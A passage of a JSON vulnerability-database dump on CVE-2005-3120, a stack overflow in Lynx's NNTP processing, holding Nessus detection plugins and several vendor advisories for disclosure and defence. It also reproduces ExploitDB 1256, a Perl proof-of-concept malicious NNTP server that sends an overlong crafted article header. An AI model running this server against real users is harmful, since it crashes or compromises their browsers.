The data returned by the NNTP server would trigger the buffer overflow and execute arbitrary code with the rights of the user running Lynx.\n Workaround :\n\n There is no known workaround at this time.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6b00044d514d9820bc0df87ffb443f5ad0411b9f5c5c1735cbc4d4de41bd0641", "hashmap": [{"hash": "668299569e0b62d5e14770fe8999084b", "key": "sourceData"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a180ab1fd989ae8dd3f59ee395472d66", "key": "href"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "f429a669c6d1aa0a5d15de3e2ff62660", "key": "cpe"}, {"hash": "e5f59ca76842056a7b62321eb5540349", "key": "description"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2018-08-11T09:16:15", "modified": "2018-08-10T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo 
Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). 
The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-11T09:16:15"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could set up a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). 
The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-11-01T02:40:14", "references": [{"idList": ["SECURITYVULNS:DOC:9961"], "type": "securityvulns"}, {"idList": ["GLSA-200510-15"], "type": "gentoo"}, {"idList": ["DEBIAN:DSA-874-1:A85D0", "DEBIAN:DSA-1085-1:3AB5E", "DEBIAN:DSA-876-1:39741"], "type": "debian"}, {"idList": ["CESA-2005:803", "CESA-2005:803-01"], "type": "centos"}, {"idList": ["OSVDB:20019"], "type": "osvdb"}, {"idList": ["USN-206-1"], "type": "ubuntu"}, {"idList": ["RHSA-2005:803"], "type": "redhat"}, {"idList": ["CVE-2005-3120"], "type": "cve"}, {"idList": ["EDB-ID:1256"], "type": "exploitdb"}, {"idList": ["SSA-2005-310-03"], "type": "slackware"}, {"idList": ["FEDORA_2005-994.NASL", "MANDRAKE_MDKSA-2005-186.NASL", "REDHAT-RHSA-2005-803.NASL", "UBUNTU_USN-206-1.NASL", "FREEBSD_PKG_C01170BF499011DAA1B8000854D03344.NASL", "DEBIAN_DSA-876.NASL", "CENTOS_RHSA-2005-803.NASL", "FEDORA_2005-993.NASL", "DEBIAN_DSA-874.NASL", "SLACKWARE_SSA_2005-310-03.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:55752", "OPENVAS:55743", "OPENVAS:55806", "OPENVAS:56855", "OPENVAS:136141256231055806", "OPENVAS:55658", "OPENVAS:55750"], "type": "openvas"}, {"idList": ["C01170BF-4990-11DA-A1B8-000854D03344"], "type": "freebsd"}]}, "score": {"modified": "2019-11-01T02:40:14", "value": 7.0, "vector": "NONE"}}, "hash": "5d3140fff159ed78cc232767bcaf884345f6e090edf065a18d6b45d7f83944b1", "hashmap": [{"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "8e15c6b081241240f6a69d63bdc75473", 
"key": "description"}, {"hash": "2ec58e3149bbfdca87c6474a76a01482", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "f429a669c6d1aa0a5d15de3e2ff62660", "key": "cpe"}, {"hash": "f5bbe8a2cc6600991512b750e4790ba4", "key": "sourceData"}, {"hash": "507c1dcbb71af7a074b2f9898d9bcebb", "key": "reporter"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2019-11-01T02:40:14", "modified": "2019-11-02T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:42\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). 
The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 1}, "differentElements": ["modified"], "edition": 9, "lastseen": "2019-11-01T02:40:14"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "f429a669c6d1aa0a5d15de3e2ff62660"}, {"key": "cvelist", "hash": "eab4d37c93551297e871c7fde674c1d5"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "8e15c6b081241240f6a69d63bdc75473"}, {"key": "href", "hash": "2ec58e3149bbfdca87c6474a76a01482"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "cf18d881f0f76f23f322ed3f861d3616"}, {"key": "pluginID", "hash": "2fe4b13d9f35cdcf8083d1525b42c81c"}, {"key": "published", "hash": "ca4f114e818b5dc0a40189d888cb0bec"}, {"key": "references", "hash": "961c51238ce339633b9f217e84eeb79e"}, {"key": "reporter", "hash": "507c1dcbb71af7a074b2f9898d9bcebb"}, {"key": "sourceData", "hash": "f5bbe8a2cc6600991512b750e4790ba4"}, {"key": "title", "hash": "725c91aa283ab77092d2e53606ccb0f8"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "10a7d6e5e71b4bd01250cb0f745bea65fcadea950c2cbcd1e65f29ba6240b27b", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3120"]}, {"type": "redhat", "idList": ["RHSA-2005:803"]}, {"type": "centos", "idList": ["CESA-2005:803", "CESA-2005:803-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:1256"]}, {"type": "ubuntu", "idList": ["USN-206-1"]}, {"type": "openvas", "idList": ["OPENVAS:55750", "OPENVAS:55743", "OPENVAS:55806", "OPENVAS:55752", "OPENVAS:55658", "OPENVAS:136141256231055806", 
"OPENVAS:56855"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2005-803.NASL", "DEBIAN_DSA-876.NASL", "REDHAT-RHSA-2005-803.NASL", "DEBIAN_DSA-874.NASL", "FEDORA_2005-994.NASL", "FREEBSD_PKG_C01170BF499011DAA1B8000854D03344.NASL", "UBUNTU_USN-206-1.NASL", "FEDORA_2005-993.NASL", "DEBIAN_DSA-1085.NASL", "MANDRAKE_MDKSA-2005-186.NASL"]}, {"type": "gentoo", "idList": ["GLSA-200510-15"]}, {"type": "slackware", "idList": ["SSA-2005-310-03"]}, {"type": "debian", "idList": ["DEBIAN:DSA-876-1:39741", "DEBIAN:DSA-874-1:A85D0", "DEBIAN:DSA-1085-1:3AB5E"]}, {"type": "freebsd", "idList": ["C01170BF-4990-11DA-A1B8-000854D03344"]}, {"type": "osvdb", "idList": ["OSVDB:20019"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:9961"]}], "modified": "2019-12-13T07:33:17"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-12-13T07:33:17"}, "vulnersScore": 7.0}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:42\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). 
The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "20035", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:08:15", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the HTrjis function in Lynx 2.8.6 and earlier allows remote NNTP servers to execute arbitrary code via certain article headers containing Asian characters that cause Lynx to add extra escape (ESC) characters.", "modified": "2018-10-19T15:34:00", "id": "CVE-2005-3120", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3120", "published": "2005-10-17T20:06:00", "title": "CVE-2005-3120", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:16", "bulletinFamily": "unix", "description": "Lynx is a text-based Web browser. \r\n\r\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\r\nconnections to NNTP (news) servers. An attacker could create a web page\r\nredirecting to a malicious news server which could execute arbitrary code\r\nas the user running lynx. The Common Vulnerabilities and Exposures project\r\nassigned the name CAN-2005-3120 to this issue.\r\n\r\nUsers should update to this erratum package, which contains a backported\r\npatch to correct this issue.", "modified": "2018-03-14T19:27:14", "published": "2005-10-17T04:00:00", "id": "RHSA-2005:803", "href": "https://access.redhat.com/errata/RHSA-2005:803", "type": "redhat", "title": "(RHSA-2005:803) lynx security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-05-29T18:33:50", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2005:803\n\n\nLynx is a text-based Web browser. \r\n\r\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\r\nconnections to NNTP (news) servers. An attacker could create a web page\r\nredirecting to a malicious news server which could execute arbitrary code\r\nas the user running lynx. 
The Common Vulnerabilities and Exposures project\r\nassigned the name CAN-2005-3120 to this issue.\r\n\r\nUsers should update to this erratum package, which contains a backported\r\npatch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012288.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012289.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012292.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012293.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012296.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012297.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012298.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012320.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012321.html\n\n**Affected packages:**\nlynx\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-803.html", "modified": "2005-10-18T18:26:22", "published": "2005-10-17T10:29:06", "href": "http://lists.centos.org/pipermail/centos-announce/2005-October/012288.html", "id": "CESA-2005:803", "title": "lynx security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2005:803-01\n\n\nLynx is a text-based Web browser. \r\n\r\nUlf Harnhammar discovered a stack overflow bug in Lynx when handling\r\nconnections to NNTP (news) servers. An attacker could create a web page\r\nredirecting to a malicious news server which could execute arbitrary code\r\nas the user running lynx. 
The Common Vulnerabilities and Exposures project\r\nassigned the name CAN-2005-3120 to this issue.\r\n\r\nUsers should update to this erratum package, which contains a backported\r\npatch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-October/012304.html\n\n**Affected packages:**\nlynx\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2005-10-18T04:24:55", "published": "2005-10-18T04:24:55", "href": "http://lists.centos.org/pipermail/centos-announce/2005-October/012304.html", "id": "CESA-2005:803-01", "title": "lynx security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T13:52:22", "bulletinFamily": "exploit", "description": "Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC). CVE-2005-3120. Dos exploits for multiple platform", "modified": "2005-10-17T00:00:00", "published": "2005-10-17T00:00:00", "id": "EDB-ID:1256", "href": "https://www.exploit-db.com/exploits/1256/", "type": "exploitdb", "title": "Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit PoC", "sourceData": "#!/usr/bin/perl --\n\n# lynx-nntp-server\n# by Ulf Harnhammar in 2005\n# I hereby place this program in the public domain.\n\nuse strict;\nuse IO::Socket;\n\n$main::port = 119;\n$main::timeout = 5;\n\n# *** SUBROUTINES ***\n\nsub mysend($$)\n{\nmy $file = shift;\nmy $str = shift;\n\nprint $file \"$str\\n\";\nprint \"SENT: $str\\n\";\n} # sub mysend\n\nsub myreceive($)\n{\nmy $file = shift;\nmy $inp;\n\neval\n{\nlocal $SIG{ALRM} = sub { die \"alarm\\n\" };\nalarm $main::timeout;\n$inp = <$file>;\nalarm 0;\n};\n\nif ($@ eq \"alarm\\n\") { $inp = ''; print \"TIMED OUT\\n\"; }\n$inp =~ tr/\\015\\012\\000//d;\nprint \"RECEIVED: $inp\\n\";\n$inp;\n} # sub myreceive\n\n# *** MAIN PROGRAM ***\n\n{\nmy $server = IO::Socket::INET->new( Proto => 'tcp',\nLocalPort => $main::port,\nListen => 
SOMAXCONN,\nReuse => 1);\ndie \"can't set up server!\\n\" unless $server;\n\n\nwhile (my $client = $server->accept())\n{\n$client->autoflush(1);\nprint 'connection from '.$client->peerhost.\"\\n\";\n\n\nmysend($client, '200 Internet News');\nmy $group = 'alt.angst';\n\nwhile (my $str = myreceive($client))\n{\nif ($str =~ m/^mode reader$/i)\n{\nmysend($client, '200 Internet News');\nnext;\n}\n\nif ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)\n{\n$group = $1;\nmysend($client, \"211 1 1 1 $group\");\nnext;\n}\n\nif ($str =~ m/^quit$/i)\n{\nmysend($client, '205 Goodbye');\nlast;\n}\n\nif ($str =~ m/^head ([0-9]+)$/i)\n{\nmy $evil = '$@UU(JUU' x 21; # Edit the number!\n$evil .= 'U' x (504 - length $evil);\n\nmy $head = <<HERE;\n221 $1 <xyzzy\\@usenet.qx>\nPath: host!someotherhost!onemorehost\nFrom: <mr_talkative\\@usenet.qx>\nSubject: $evil\nNewsgroup: $group\nMessage-ID: <xyzzy\\@usenet.qx>\n.\nHERE\n\n$head =~ s|\\s+$||s;\nmysend($client, $head);\nnext;\n}\n\nmysend($client, '500 Syntax Error');\n} # while str=myreceive(client)\n\nclose $client;\nprint \"closed\\n\\n\\n\";\n} # while client=server->accept()\n}\n\n# milw0rm.com [2005-10-17]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1256/"}], "ubuntu": [{"lastseen": "2019-05-29T17:23:29", "bulletinFamily": "unix", "description": "Ulf Harnhammar discovered a remote vulnerability in Lynx when connecting to a news server (NNTP). The function that added missing escape chararacters to article headers did not check the size of the target buffer. Specially crafted news entries could trigger a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the user running lynx. 
In order to exploit this, the user is not even required to actively visit a news site with Lynx since a malicious HTML page could automatically redirect to an nntp:// URL with malicious news items.", "modified": "2005-10-17T00:00:00", "published": "2005-10-17T00:00:00", "id": "USN-206-1", "href": "https://usn.ubuntu.com/206-1/", "title": "Lynx vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:49:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update to lynx\nannounced via advisory DSA 874-1.\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.3.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55750", "id": "OPENVAS:55750", "title": "Debian Security Advisory DSA 874-1 (lynx)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_874_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 874-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
